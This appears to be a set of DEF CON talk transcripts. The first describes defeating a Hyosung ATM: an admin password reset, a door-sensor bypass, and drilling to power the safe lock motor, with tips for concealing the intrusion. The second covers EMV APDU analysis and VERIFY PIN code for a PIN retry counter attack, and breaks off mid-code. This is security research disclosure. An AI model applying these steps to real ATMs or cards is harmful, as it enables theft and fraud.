By the early 2000s — around 2003 — there had been a consolidation resulting in three major interbank networks, and now about 70% of the volume in the United States goes over those three networks. Past talks on ATM hacking have discussed building a dummy backend for the ATM to connect to that would pretend to be the payment processing host. I really wanted to see what the real thing was like. To do this, I had to become a licensed ATM operator. Why did I do that? I really wanted the full, real experience. I want to understand exactly what it takes to get an ATM fully functioning and operate it after the fact. After my research is done, I want to put this thing into use. Minnesota is about to legalize weed, so maybe I'll put it out at a dispensary. Why do I have to be licensed? The primary reason these laws and licenses exist is to prevent money laundering and funding of nefarious activities. This is really tied to the Patriot Act of 2001. You can imagine what I mean by nefarious activities. The licensing is done through NMLS, the Nationwide Multistate Licensing System. I provide processor information, there's a background check, I have to fill out a bunch of paperwork, I have to show them my bank statements and let my bank know what I'm doing. I have to pay a couple hundred bucks in license fees, and it takes about four weeks or so. You're going to fill out the paperwork wrong no matter what you do, and you're going to have to go back and forth a few times and sit on hold with the state and whatever. Sooner or later, you will become a licensed financial terminal owner. I've got this thing on the network. I have my license. I can connect to the ATM network, the real thing. How am I going to do that? I'm going to use a LAN tap, because I want to do this very transparently and not in any way that somebody can know what I'm doing. There's no opportunity for traffic manipulation here. It's really just sniffing, and I'm sniffing my own traffic. As I run my own transactions with my own card, I can see what's happening. The way a LAN tap works is there's a pass-through that goes directly through and is transparent to the server and the client. These other two ports that you can see are outbound from the ATM, so outbound traffic, which goes to my laptop. Then inbound traffic coming into the ATM also goes to my laptop. If I spin up Wireshark and attach to both of those Ethernet devices, I can see traffic in both directions. The problem is it's encrypted with TLS 1.2. The ATM provides you a way to upload your own signing certificate, which I found very interesting. If you put a self-signed cert on a USB stick and stick it in the back where we saw before and you go to this screen, it says download cert from USB. Not really sure how that all makes sense, but it's there. We've taken a little look at the inside. We've taken a little look at the network. With the EPP replaced, I can now successfully boot the ATM and enter some data. One side note here: anytime I see a big red thing that says warning and then do not do something, I always pay special attention to that. I like to do things that I'm not supposed to do. This one says don't remove the cover, bad things will happen. At some point, I'm going to look exactly into what that bad stuff is and see how this is implemented. It sounds like a really interesting research project.
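Going back to the LAN tap for a second: since both monitor ports just mirror traffic, recording them is easy to script. Here is a minimal sketch using Scapy; the interface names are placeholders for whatever the two tap ports enumerate as on the laptop, and because the session is TLS 1.2 this only records ciphertext for later analysis in Wireshark.

```python
import time
from scapy.all import AsyncSniffer, wrpcap

# Placeholder interface names for the two monitor ports of the LAN tap.
OUTBOUND_IF = "eth1"   # copy of ATM -> payment processor traffic
INBOUND_IF = "eth2"    # copy of payment processor -> ATM traffic

def capture(seconds: int = 60) -> None:
    """Record both tap directions (requires root) and merge them into one pcap."""
    out_sniffer = AsyncSniffer(iface=OUTBOUND_IF, store=True)
    in_sniffer = AsyncSniffer(iface=INBOUND_IF, store=True)
    out_sniffer.start()
    in_sniffer.start()
    try:
        time.sleep(seconds)   # run a transaction on the ATM while this sleeps
    finally:
        out_sniffer.stop()
        in_sniffer.stop()
    packets = (out_sniffer.results or []) + (in_sniffer.results or [])
    packets.sort(key=lambda p: float(p.time))   # interleave by timestamp
    wrpcap("atm_tap.pcap", packets)
    print(f"wrote {len(packets)} packets to atm_tap.pcap")

if __name__ == "__main__":
    capture()
```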
Anyway, booting this time, I get this great error message. It says FFF, and that means that I need to provide some more setup information to the machine. To access the admin screen, I'll do enter, clear, cancel, 1, 2, 3. This gives me this nice enter password UI, but I don't know the password. This is the PIN I need to get to the admin interface. I tried multiple times to reach anyone associated with the previous owner, still no luck. I have no idea. The PIN is stored in memory somewhere on that board. I have no idea how to get to it. I don't know if it's encrypted. It's good to note that this password is different than the safe combination. The safe vault lock does not have any idea that this interface or this computer even exists. They're completely separate. This is just to get access to the admin operator interface. The default password here is 555555555555. I know that because it's in their documentation. But unfortunately for me, that didn't work. I tried and I tried and I tried and I was up very late. The UI does give you three chances to enter the correct password, but then it'll send you back to the start screen again, and then you have to do enter, clear, cancel, 1, 2, 3. After a few days of guessing and falling asleep in my chair after guessing, I gave up and looked for other ways. So it turns out, after a lot of Googling and reading, I found that in recent versions of the software, Hyosung has implemented a security feature where the operator function passwords cannot be reset to factory defaults unless it's performed during the machine's first boot after reloading the software. If there's any way around this, I have no idea. I couldn't find it. The search continues. All right, so how does the software reinstall work? Well, various versions of the ATM software are available if you search around. I found this one and downloaded it. I would love to find some older versions of this. If anybody knows where I can get my hands on some older versions of this software for the Hyosung 2700CE, I would really appreciate it. This set that I found was, I think, the most recent version. So I put it on an SD card. There are various files here. If you want to know what they do, I think Brenda So talked about that in last year's talk. I did delve into the update folder, where I found a master.zip file, and opening that is super fun. There's lots of fun stuff to play with here. I'm not sure if the bat files or some of these other files, the icons and the backgrounds, have any sort of CRC associated with them. If there's any check run on those — if you can modify them, put them back on this disk, stick it in the machine, and have it do some fun stuff — that's another research topic altogether that I wish I had time for and will probably do in the future. So my SD card goes in this slot. I have to push down dip switch number four to make it boot into diagnostic mode. And this is where the computer will do all kinds of fun stuff and read things off the SD card. So pick SD card. And now we're doing a software update. This takes about 10 minutes or so. That's what this install looks like. And after you do that, it will reboot and now you'll get the same screen. And we can reset the master password. All right, so here's how we do that. We reboot again. And during the initializing screen, we get out our old Nintendo fingers and do clear, left, right, clear, clear, cancel, clear, left, right, clear, clear, cancel. If successfully recognized, the machine will ask you if you want to reset the master password.
And then it will be set back to 5555. There's one caveat to this. It's not going to happen unless the safe door is open. If the safe door is not open, you're just going to get back to this screen. And so at this point, the safe door is not open. But I need to open it. I need to open it to complete the password reset for the computer, and I need to get into it to see if there's any cash in there, right? I really don't want to destroy the door in the process. I've already explained why. So the first question I have is, how does this computer know the door is closed? There must be a sensor somewhere in there connected to the door, connected to the main board. I have access to the main board. I should be able to do this. So I reached for my favorite tool, the borescope. This here is a Depstech unit: 5 megapixels, HD resolution, rechargeable battery, wireless connectivity. It's great. The cable is semi-rigid — you can bend it around corners — and it's $50 on Amazon. How could you go wrong? As we'll see later in this talk, I did use this other, smaller scope, an otoscope camera. It's made to stick in your ear. This has a diameter of 5.5 millimeters, much smaller than the previous one. It's about $50 for this camera as well. So I got the scope inside the ATM using the corners of the cash dispensing tray, and also that hole where the wire came up for the lighting of the door. This is what I see inside. It's the reject bin. I can see the lock, the electronic safe lock down there. I can also see some wires far down there. If I turn the borescope a little bit, I can see the safe switch — the momentary switch is the word I was looking for. This momentary switch is connected to the door, and the door is pushing it in, and it's basically telling the computer whether the door is open or closed. Following this wire up away from the momentary switch and across through some portion of the ATM, it finally surfaces through this hole up to where the main board is. It comes over to this junction where it's conveniently labeled front, and then it goes on over to the board where it's labeled CN16. So if I unplug this, the question is, does it fail open or closed? Well, let's do an experiment to find out. I recorded this demo after I had the vault door open and the ATM was all set up and operational. But the results are the same, because the door is closed now and the ATM is operational because the door is closed. If I pull the door sensor plug, then the computer should think that the door is open and it should become not operational. So what happens is I pull out the plug and it says the door is open. The ATM is temporarily out of service. But it's not, right? We just saw the door's closed, but this is exactly what we needed in this case. So I pull out the plug, I reboot, and while initializing, we do clear, left, right, clear, clear, cancel, and we get to this screen, reset master password. Reset master password, click yes. All right, it reboots one more time. I get here. 55555555, and here I am as an administrator inside the computer. All right, so at least one of you is wondering, what was that QR code back there? Well, it's nothing. I'm not sure why that's there. It does not seem to be something that is alterable through the configuration, and it just leads to nothing, a Google search, I guess. I have no idea. All right.
So now the password's reset, I can get to the ATM's insides, I can configure it as I wish, but we really need to get into the safe to make this thing fully operational. And, well, see what's in there, right? So how? Well, first things first, what lock is this thing? Back to the borescope for some recon. I can see the lock, I can see some writing on it. It turns out, with a little Googling, I find that all of this particular type of ATM uses this La Gard LG Basic electronic lock, and this is what it looks like. Now, in 2016 at DEF CON 24, Plore did a great talk about side channel attacks on this type of lock. He used a side channel attack to deduce the correct combination of the Sargent and Greenleaf Titan PivotBolt. Very similar to the lock that I have, the La Gard Basic, but not exactly the same one. There's also this YouTube video by EEVblog attempting the same attack on the La Gard lock, but without success. So I decided to come up with another way to figure out how these things work. I ordered one, and I also found out that there's another option, which I assume works the same sort of way, along the same lines as Plore's attack. This is called the Little Black Box. And this device, as well as this Phoenix device, can basically reset the safe combo. So you take the cord that goes into the safe from the keypad and you hook it up to this device. It determines what lock you have hooked up to it, and then you click reset. And what it's going to do now is some sort of an attack against the lock itself. I believe it basically guesses every combination in less than 15 minutes. And once it guesses the combination, I guess somehow it resets it. I really don't know how this thing works. You can only buy this if you're law enforcement or if you own a bank or are a licensed locksmith. So it costs about $3,000, and I don't have that much money, so I need another way. So I take off the cover. We see the circuit board. If you take the circuit board out, then you can see the lock mechanism with the bolt and the rotation axis of the bolt; the main bolt handle forces it down and rotates it in a clockwise direction. There is an anti-force mechanism here. There's a spring and a notch on the lock and the bolt. If you push down too hard, that notch basically engages and you can't push anymore. If we are able to rotate that lock fully clockwise, then we will push that secondary bolt over into the notch, into that linchpin. Now that linchpin will stop the secondary bolt from going over there unless we type in the correct code, which then provides a nine-volt DC charge to the little motor attached to the linchpin. The motor runs, the linchpin is moved, and we can open the lock. All right, so now we know how this thing works. Here's a close-up of the DC motor and the linchpin. And again, if we apply a charge to the motor, then it'll open. So basically, all the money in this vault — $300,000 potentially — is protected by the lack of voltage to this DC motor. So is there a way, from the outside of the vault, to get voltage to this DC motor without anyone knowing, or without destroying the lock or destroying the vault or destroying the case? Let's have a look. This is a short video of the lock in action. Look in the middle of the lock at that linchpin and you'll see, after I type in the code, the motor turns, the linchpin goes up, which would allow the bolt to turn and the lock to open. All right, so here's a look at the keypad.
And another interesting thought that I had was, you know, there's a lot of space inside this keypad thing that mounts on the front. And it doesn't appear to me, just doing some cursory research, that there's any encryption of the numbers that are pressed on the keypad as they're being sent into the lock. And so what you see here is a small experiment with an Arduino Nano in which I'm capturing key presses on the keypad, recording them into the Arduino Nano, and then passing them back out to the lock. Very interesting research can be done here. I believe this is a successful man-in-the-middle attack against this particular lock. So yeah, moving on from that, we can see that I wasn't going to be able to use that attack to get into my safe, so I had to continue on. Here are the power wires. They pass directly under the circuit board on the door side of the lock. So the metal you see in this picture would actually be against the door. And the lock sits directly behind this keypad. And the keypad is removable. And if we do remove the keypad, we can see through the hole where the wire goes to the lock that it is indeed the back of the lock. And it gives us this nice little landmark to know exactly where on the lock we are, because of this little solid silver dowel — I have no idea what it does or why it's there, but it is there and it gives us a landmark. That little red X you see is exactly where those wires are that we need to get access to. All right, so I need the right tool for the job to get access to this, something I've always wanted: an electromagnetic drill press. All right, so you're probably saying, wait a second, this is cheating, right? Well, hear me out, hear me out. I figure if I can just get a visual on those wires from the outside, I can come up with a way to supply current to them. And there just happens to be an existing hole in the door from the factory that allows for a different orientation of the keypad if you want. The hole is a quarter inch in diameter and it's exactly where I need it to be, and it's there from the factory. I need this to be a little bit bigger, but not too much. I went with a half inch carbide bit, so I made the hole diameter a quarter inch bigger. All right. Well, I put this bit in and I get my drill hooked up. Now this drill has a holding force of about 3,000 pounds — it's not going anywhere once you turn it on — and the RPMs of this drill are about 1,200. The safe door is really no match for a carbide-tipped drill bit. It really only takes a couple of minutes to get in there. It takes me a little bit longer because I'm not exactly sure what the depth is, but suffice it to say, I get into the lock without damaging it in any way. And now we can see the wires of interest. And now keep in mind, if I put the keypad back on, our mischief is fully concealed and nobody is the wiser. All right, so the last piece of the puzzle. How do I get power to these wires through this half inch hole without breaking the lock? After a lot of thinking and digging around, I figured out that there's this tool called a puncture probe. It's exactly what I needed. This is how it works. The idea: you retract the puncture pin, you get the wire in there, you release the pin into the wire, and you have connectivity, and you can connect a wire down at the base of the probe. So this is kind of what that looks like. I built my own probes because those plastic ones were far too big.
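Going back to that keypad man-in-the-middle for a moment: the Arduino side isn't reproduced here, but purely as an illustration, this is a hypothetical host-side logger, assuming the Nano were programmed to echo each captured keypad digit over USB serial, one digit per line, at 115200 baud. The port name, baud rate, and output format are all assumptions made for the sketch, not details from the actual experiment.

```python
import serial  # pyserial

# Hypothetical settings: assumes the Nano prints one captured digit per line.
PORT = "/dev/ttyUSB0"
BAUD = 115200

def log_keypresses(path: str = "keypad_log.txt") -> None:
    """Append every digit reported by the Nano to a log file."""
    with serial.Serial(PORT, BAUD, timeout=1) as ser, open(path, "a") as log:
        print("listening for captured keypad digits, Ctrl-C to stop")
        while True:
            line = ser.readline().decode(errors="replace").strip()
            if line:
                log.write(line + "\n")
                log.flush()
                print("captured digit:", line)

if __name__ == "__main__":
    try:
        log_keypresses()
    except KeyboardInterrupt:
        pass
```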
So what I'm doing here is I've punctured these wires on my workbench and I'm applying a nine volt charge to them, and you can see that it is opening. Again, the problem was that these were way too big for the access port that I had drilled, and I certainly didn't want to cheat anymore by making the hole bigger. So I designed something smaller. At the time I used this little piece of wire with a hook on the end. And here you can see what it looks like when it's all set up. I hooked up the nine volt battery and nothing happened. I was a little worried that my nine volt battery was bad, so I hooked it up to a DC power supply and I gave it 17 volts, just in case it needed a little extra juice. Here's the full scene when the vault was opened for the first time, back in, I believe, the end of March or early April. Yeah, so you can see the scope there, and you can see the tool that I used, the puncture probe, the wire tool that I created, and the inside through the borescope, and then here we go — the door is open for the first time and we can see inside. So here's a demo of what just happened. As you can see, the lock is locked as I push down on it; then, attaching the probes and applying voltage, the lock opens. I'm going to skip forward because I'm running a little bit out of time here. So we're just going to go past this one — again, if I put the keypad in place, there's no evidence of intrusion. And as an added bonus, if you want to go the extra mile, you can cover the access hole with this half inch plastic cover — barely noticeable, right? Right, all right. So again, I wasn't satisfied with the size of that probe; there must have been a way to do it with a smaller hole. So I started taking these probes apart. I pulled off the plastic sheathing and saw the probe inside. I went and grabbed a stainless steel three millimeter tube, put a little notch in the end, and heated up the tube to melt it into the plastic of the probe. And this is what it looks like when it's all together. And it's a lot smaller — 2.9 millimeters versus 6.2 — which means I can now do this attack with a much smaller hole. All right, some loose ends quickly. I sent dormakaba this letter to give them some pre-talk disclosure. I never got any response to this. Here is my email to security at Hyosung America. I never got a response to this one either — I got a delivery failure notice instead. As far as the money: there was money in the ATM. On the advice of trusted sources, I am not going to tell you exactly how much it was. I will not disclose that, but there was enough to pay for the research project and the ATM, and a little bit left over. All right, some follow-up research. ATM Wi-Fi — really cool, I think. The vault lock man-in-the-middle I showed. The ATM software modifications we talked about — maybe the USB and SD card could be fun to mess with. Internal serial comms between the top and the bottom, between the CDU and the computer — can we capture and replay? How about EPP deconstruction and analysis — that warning message we saw? All of those topics I think are fascinating and I will continue research. If anybody else wants to join me, please reach out to me. So in conclusion: no key, no PIN, no combo, no problem. Thanks for watching. Have a great day and I hope you have a fabulous DEF CON. Bye bye.
|
Since the late great Barnaby Jack gave us “Jack Potting” in the late 2000s, there have been several talks on ATM network attacks, USB port attacks, and digital locks attacks which apply to several brands of ATM safes. In this session, I’ll discuss and demonstrate how most of these known attack vectors have been remediated, while several fairly simple attacks against the machine and the safe still remain. We’ll dive into how ATMs work, the steps I went through to become a “licenced ATM operator” which enabled my research, and how I identified the vulnerabilities. I’ll show how, with very little technical expertise and 20 minutes, these attacks lead directly past “secure” and allow attackers to collect a lot more than $200. REFERENCES Barnaby Jack - “Jackpotting Automated Teller Machines” - (2010) from DEFCON - https://www.youtube.com/watch?v=FkteGFfvwJ0 Weston Hecker - “Hacking Next-Gen ATM's From Capture to Cashout” - (2016) from DEFCON - https://www.youtube.com/watch?v=1iPAzBcMmqA Trey Keown and Brenda So - “Applied Cash Eviction through ATM Exploitation” (2020) from DEFCON - https://www.youtube.com/watch?v=dJNLBfPo2V8 Triton - “Terminal Communications Protocol And Message Format Specification” (2004) from Complete ATM Services - tinyurl.com/7nf2fdy5 Rocket ATM - “Hyosung ATM Setup Part 1 - Step by Step” (2018) from Rocket ATM - https://www.youtube.com/watch?v=abylmrBkOGM&t=3s Rocket ATM - “Hyosung ATM Setup Part 2 - Step by Step” (2018) from Rocket ATM - https://www.youtube.com/watch?v=IM9ZG46fwL8 Hyosung - “NH2600 Service Manual v1.0” (2013) From Prineta - https://tinyurl.com/c6jd4hd9 Hyosung - “NH2700 Operator Manual v1.2” (2010) From AtmEquipment.com - https://tinyurl.com/rp2cad8
|
10.5446/54234 (DOI)
|
Hello everyone, it's really a pleasure to be part of DEF CON 29. My name is Salvador Mendoza and I'm a security researcher at Metabase Q, and I'm proudly a member of the Ocelot offensive security team. Today I'm going to talk about the PINATA attack, or PIN Automatic Try Attack, against EMV technology. So let's start with the agenda for today. We're going to have an introduction to terminology. Also, we're going to talk about the EMV transaction flow, which basically is how the card data goes from the terminal to the bank institutions and how it's processed. After that, we're going to talk about the inadequate implementation behind this attack and how someone could exploit it. Finally, we're going to have a demo implementing an internal tool named ELMA. And after that, we're going to have some conclusions regarding this research. Let's analyze some terminology that we're going to use throughout this presentation. Some of these terms are going to be very important for the demos, for example, or to understand more in depth how the issue, or the bad practice, is implemented. So let's start with the secure element, or SE, which is basically responsible for keeping the secrets in the physical card and for signing the transaction when it's being processed. The CVM is the cardholder verification method, which could be different things: it could be verifying the transaction by signing it, or it could be by PIN entry. Also, we have the APDU, the application protocol data unit, which is the protocol in charge of handling the communication between the card and the terminal. Also, we have the ICC, or integrated circuit card. We know these cards as smart cards as well, for example, but we're going to talk specifically about EMV transactions, just to be clear. The PRC is the PIN retry counter, one of the most important terms that we're going to use during this presentation. And also the ARC, or authorization response code, and the ARPC — how the bank institution responds back to the transaction and to the terminal. EMV contact payment is one of the most common and secure technologies that we implement and use every day to make transactions, because it implements a secure element, and the secure element is in charge of signing the transactions, or signing the challenge that the terminal is sending to the card. Basically, contact payment is when we insert the card into a terminal and we leave it there until the transaction finishes. Sometimes the user will be required to enter the PIN for the transaction, and sometimes it will require signing a paper to verify the transaction. When the card is inserted into the terminal, it's going to be detected, and after that it's going to be reset. It's going to list the applications, and it's going to go through different steps until the transaction is complete. During these steps, one of the most important decisions is whether the transaction is going to be processed online or in offline mode. It will depend on different factors, and of course it's going to depend on the verification method. If we take a look into different details regarding the terminal and card communication, we can see in the protocol phases how this transaction goes through. For example, we have the card authentication, we have the cardholder verification method, and also we have the transaction authorization, which is going to be the last phase, after the verification in the transaction.
When the terminal starts sending commands to the card, the card must answer back for each specific command. For example, let's say the terminal sends a command that is not properly formed; the card will answer back that the command wasn't right. The terminal is going to prepare a new command and send it back to the card. Basically, it's like when you are typing something into a terminal and for every command you get a response back. It's the same thing between the terminal and the card: it's like sending a command and getting a response back very quickly. One of the most important parts in this protocol phase is the cardholder verification method, which we are going to exploit for the PINATA attack. Many people think that the communication between the card and the terminal is encrypted, but it's not. They use ISO 7816, which many other technologies use as well — NFC, for example. NFC implements the APDU layer to communicate with the terminal as well. Also, the same technology that we use for our cell phones — the SIM chip that you put in the cell phone — communicates over the same APDU layer with the cellular phone. The communication is not encrypted, but it needs to follow a format. We are going to analyze what that format is: what the APDU command format is, and also what the APDU answer format is — how they know how to answer back and in which format. Take a look into the different details and parameters inside of this APDU protocol. Let's analyze one of the most important parts of the APDU protocol, which are the commands and the responses. Let's start with the APDU command, which is a little different from the card response. We have a header and we have a body. In the body, we have the length of the command and also the data of the command — the command, basically. In the response, we have the data and we have the trailer. The trailer is basically the status of the previous command from the terminal, which tells whether the command was executed correctly or whether there is something wrong, and the answer is going to be in the status of this trailer. To have a better idea, let's analyze an APDU command sample. This is going to be the first command that the terminal sends to the card. If we break it apart, we can see what the class is, what the instruction is, we have parameter one, parameter two, we have the command length, and after that we have the data that is going to be sent to the card. In the same way, we have the card response, which is basically the data, and after that the trailer. In this particular sample, we have the data, and the trailer is going to be 90 00, which basically means that the previous command was executed correctly. To analyze the data in this response, for example, we need to decode it. To decode this data, we need to use the TLV decoding method, or we can use the emvlab.org decoding tool, where you basically paste in the APDU and it's going to break apart each command or each answer from the card, which is very straightforward. With this type of tool, we can very quickly analyze responses and commands to see what is inside of the APDU protocol. It's essential to understand the process and the communication between the terminal and the card. As a security researcher, sometimes you need to find a way to test some implementations, but sometimes, even when you have the idea, you need to design or create hardware or software, depending on what you want to test.
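To make that command/response layout concrete, here is a minimal Python sketch that splits a command APDU into its header fields and body, splits a response into data plus the SW1/SW2 trailer, and walks a simple BER-TLV blob the way the emvlab.org decoder does. The example bytes are generic placeholders (a SELECT of the payment system environment and a made-up FCI), not data from a real card, and the TLV walker only handles the short length forms needed for small EMV records.

```python
def parse_command(apdu: bytes) -> dict:
    """Split a command APDU into header fields and body (Le ignored for brevity)."""
    cla, ins, p1, p2 = apdu[:4]
    lc = apdu[4] if len(apdu) > 4 else 0
    return {"CLA": cla, "INS": ins, "P1": p1, "P2": p2, "Lc": lc, "data": apdu[5:5 + lc]}

def parse_response(resp: bytes) -> dict:
    """Split a response APDU into data and the SW1/SW2 trailer."""
    return {"data": resp[:-2], "SW1": resp[-2], "SW2": resp[-1]}

def parse_tlv(data: bytes) -> list:
    """Very small single-level BER-TLV walker, enough for short EMV records."""
    out, offset = [], 0
    while offset < len(data):
        tag = data[offset]; offset += 1
        if tag & 0x1F == 0x1F:               # two-byte tag (e.g. 9F17)
            tag = (tag << 8) | data[offset]; offset += 1
        length = data[offset]; offset += 1
        if length == 0x81:                   # one long-form length byte
            length = data[offset]; offset += 1
        out.append((hex(tag), data[offset:offset + length].hex()))
        offset += length
    return out

# Placeholder SELECT command ("2PAY.SYS.DDF01") and a made-up response ending in 90 00.
select_ppse = bytes.fromhex("00A404000E325041592E5359532E444446303100")
print(parse_command(select_ppse))
resp = parse_response(bytes.fromhex("6F078405A0000000039000"))
print(resp, parse_tlv(resp["data"]))
```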
This was the case when we needed to design a tool to analyze the APDU protocol between the contact card — the EMV card — and the terminal, because we know that these are called secure cards, but one thing is what they say, that they are secure cards, and another thing entirely is the implementation. So we decided to create, or to design, the ELMA technology. The ELMA tool is an EMV laboratory malware assistant, which is basically what it does: it assists in analyzing the EMV protocol between the terminal and the card. We're going to go into details about how we designed this hardware and what capabilities we have in the laboratory to analyze these technologies. This is the ELMA board. It's based on SIMtrace 2, which is an open hardware project. It's specifically designed for the SIM technologies implemented in cellular phones on the GSM network. The idea of SIMtrace 2 is that you can sniff or emulate traffic using the SIM adapter on the board, or using the USB cable connected to a client on the computer. On the other hand, the ELMA board is specifically designed using flexible adapters and buttons, but it also has the capability to use USB to feed the board or to analyze the traffic between the terminal and the EMV card. Also, it's capable of connecting to a server using the Wi-Fi connectivity of the ESP32, and it helps us a lot in the laboratory to understand the protocol and the features of the EMV card. These are some of the characteristics of the ELMA board. We have the USB-C connector, which basically is for flexibility. Also, we have the ESP32 that we implemented for Wi-Fi connectivity to a server, or to an external server, where we can send data from the board, process it, and send it back to the board, so the board can emulate it directly to the terminal. Of course, we have different adapters to connect, like, for example, EMV cards or SIM cards. We have different modes — they could be sniffing, fuzzing, or emulation — depending on the task. Let me show you how a connection for sniffing traffic looks. We have the EMV card on one side, and we have the ELMA in the middle. After that, we use another connector with a physical board that simulates a physical EMV card to the terminal, which basically sends the data through the ELMA, and it simulates a transaction, let's say, for example. Basically, the idea is to sniff the traffic from the card to the terminal and read the responses from the card. The idea of seeing the commands from the terminal and seeing the responses from the card is to analyze how they interact with each other. After that, we can analyze the responses to see if there is something weird during this communication process. Let's analyze the ELMA toolset. ELMA has different capabilities in the client and also in the board. For example, we can use a sniffer or an emulator, depending on the task. Let's say, for example, that we want to sniff some traffic. We can run the sniffer firmware, or if we want to emulate something, we can use the emulator for that task specifically. Inside of the emulator, we have different features, like man-in-the-middle. The man-in-the-middle can alter the CVM, basically the cardholder verification method. Imagine that we have a list of cardholder verification methods where, depending on the order, one of them could end up being the verification method used.
We can change that by implementing this type of man-in-the-middle emulation mode. Also, we can change the terminal commands. We can adapt the card response. One of the most important parts is that we can modify any EMV tag value. This is to test the environment, basically. Also, we have an APDU fuzzer. It's for sending random data to the terminal or to the card to see if we can break something. Of course, we have the PINATA attack in these features, which is basically what this presentation is based on. On top of all of that, we have the option to implement a relay. This means that, for example, we can have the ELMA board on one computer, and the physical card could even be in another location. We can extract data from that card using the client for the ELMA board. The virtual smart card is the core of the ELMA technology. Basically, I can relate it to a software emulator of a smart card, but you have the capability to connect physical card readers to your computer and move the data between these virtual smart card readers, change the data, and send it back. It could be sent back over a relay, for example, or you can send it back locally to another device that is connected. It's very easy to use, and we use it a lot in the ELMA design. After analyzing the APDU protocol and how we designed the ELMA prototype, or ELMA technology, let me talk a little bit about the inadequate implementation that resets the PIN retry counter in EMV bank cards. Let's talk a little bit about what the process in the protocol is when a transaction starts at the terminal. Initially, we have the card authentication, after that we have the cardholder verification, and then we have the transaction authorization. Let's start with the card authentication. In this step, the terminal starts sending commands to list the applications. Basically, at this point the terminal knows what kind of card you are using — a Visa, a MasterCard, an American Express, or something else. The next step is going to be the cardholder verification method. It's where the terminal is going to prompt you to enter a PIN, or it's going to ask you to sign on the terminal; it's going to depend on the terminal technology and, of course, on the card technology. All of this process is going to finish with the transaction authorization. In this part, the terminal sends all the data to the backend, to the financial institution, and the financial institution sends back the ARC, which basically is the authorization response code. This is applied to the card and, of course, applied to the transaction. At this point, the transaction can go through, or it could be declined. It's going to depend on all of these factors. Let's focus in on the cardholder verification phase, which is one of the important steps in this research. Do you know how many cardholder verification methods there are to make a transaction, for example? Let's focus and read a little bit about how many of these verification methods are available in the backend, the terminal, and the card when you're making a transaction. We have a list inside of the card that tells the terminal what kinds of verification methods it is capable of. Some of them are: no CVM required, signature on paper, plaintext PIN by ICC, plaintext PIN by ICC and signature on paper, also enciphered PIN by ICC, or enciphered PIN by ICC and signature on paper.
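Those methods are encoded on the card as two-byte rules — a CVM code plus a condition byte — inside the CVM List that comes up next. As a rough illustration, here is a small sketch that maps the standard CVM codes to the names above; the example bytes are invented for illustration, not taken from the card shown in the talk.

```python
# CVM codes from the EMV specification (low 6 bits of the first rule byte);
# bit 0x40 means "apply the next rule if this one fails".
CVM_CODES = {
    0x01: "Plaintext PIN verified by ICC",
    0x02: "Enciphered PIN verified online",
    0x03: "Plaintext PIN by ICC and signature",
    0x04: "Enciphered PIN verified by ICC",
    0x05: "Enciphered PIN by ICC and signature",
    0x1E: "Signature (paper)",
    0x1F: "No CVM required",
}

def decode_cvm_list(tag_8e: bytes) -> list:
    """Decode the rule part of a CVM List (tag 8E) into readable entries."""
    rules = []
    body = tag_8e[8:]                      # skip the two 4-byte amount fields (X and Y)
    for i in range(0, len(body), 2):
        code, condition = body[i], body[i + 1]
        rules.append({
            "method": CVM_CODES.get(code & 0x3F, f"unknown ({code & 0x3F:#04x})"),
            "apply_next_if_fails": bool(code & 0x40),
            "condition": condition,
        })
    return rules

# Invented example: zero amounts, then enciphered PIN online, plaintext PIN by ICC,
# signature, and finally the 1F03 "no CVM required" rule mentioned in the talk.
example = bytes.fromhex("0000000000000000" + "4203" + "4103" + "5E03" + "1F03")
for rule in decode_cvm_list(example):
    print(rule)
```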
One of the most important is enciphered PIN verified online, which is the normal verification when you are using an ATM, for example. There the verification is enciphered PIN, verified online, all the time. These are some of the most common cardholder verification methods that we use in transactions. Let's analyze this card response, where we need to take a look at the CVM list, paying special attention to the 8E tag value. The first step is to decode it to see how it's implemented, or what kind of value the 8E tag contains. After we decode it, we can see the cardholder verification method list. Inside of the list, we have all the values — all the possibilities that the physical card has to verify a transaction. Specifically, I'm talking about the 8E EMV tag. If we split the values, we can understand them individually. Let's do that. We have this list, and we are going to separate each value to understand what exactly it means. We have enciphered PIN verified online in the first row, if the terminal supports the CVM. The second row is enciphered PIN by ICC. The third row is plain PIN by ICC. The next one is the signature. The last one is no CVM required. You can see this list is in order. Can you imagine what happens if I flip the values? Let's say I put the 1F03 at the top of the list. That could be another attack, for other research. Let's say we want to focus on the plain PIN by ICC. What this verification method does is let you verify a PIN against the ICC. For example, I want to verify the PIN 1, 2, 3, 4. I can send this 1, 2, 3, 4 to the card using this command. The EMV card has different possible responses. Let's say that's the right PIN: it's going to be a 90 00, which is going to be the trailer of the EMV card response. But there are other options too. Like 63 C2, which means it was a wrong PIN, but you have two more attempts left. After that, it's going to be 63 C1, which means a wrong PIN and one more attempt left, and 63 C0, which means a wrong PIN and no more attempts left. So, if you imagine, this is a counter — the PIN retry counter — which basically counts how many attempts are left inside of the ICC. So, if this counter goes to 0, that means that we don't have any more possibilities to attempt another PIN, which is a mechanism to protect against brute force attacks. So, to be able to send these commands to the EMV card, first, of course, the card has to support plain PIN by ICC. And the other thing is, if we go through the EMV flow chart, we can see that to send PINs to the card, we need to go through the card authentication, and after that, we're going to be in the cardholder verification. At this point is where we'll be able to send commands to the card. So, let's say that we start by checking the PIN retry counter, and at this point, the PIN retry counter has three more attempts left to try different PINs. So, we start sending the PIN 0718, and we get the response back, which is 63 C2, which basically means it's a wrong PIN, and we have two more attempts left. After we send the last PIN, which is going to be 0720, we can notice that we got 63 C0, which means the PIN retry counter is equal to 0. That means that we don't have more attempts left, and we are not able to try more PINs. So, here the question is, how can we reset this PIN retry counter to 3 again? We have two common ways to reset the PRC, or the PIN retry counter.
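Before getting to those, here is a quick reference sketch of the VERIFY exchange just described, following the ISO 7816 / EMV layout for plaintext offline PIN (CLA 00, INS 20, P2 80, PIN block "2" + length + digits padded with F) and interpreting the 90 00 / 63 Cx status words. How the APDU is actually sent is left out; the printed example PIN is just illustrative.

```python
def build_verify_apdu(pin: str) -> bytes:
    """Plaintext offline PIN VERIFY: 00 20 00 80 08 <plaintext PIN block>."""
    assert pin.isdigit() and 4 <= len(pin) <= 12
    block = f"2{len(pin):X}" + pin + "F" * (14 - len(pin))   # control nibble, length, digits, F padding
    return bytes.fromhex("0020008008" + block)

def interpret_sw(sw1: int, sw2: int) -> str:
    """Translate the trailer of a VERIFY response."""
    if (sw1, sw2) == (0x90, 0x00):
        return "correct PIN"
    if sw1 == 0x63 and sw2 & 0xF0 == 0xC0:
        return f"wrong PIN, {sw2 & 0x0F} attempt(s) left"
    if (sw1, sw2) == (0x69, 0x83):
        return "PIN blocked"
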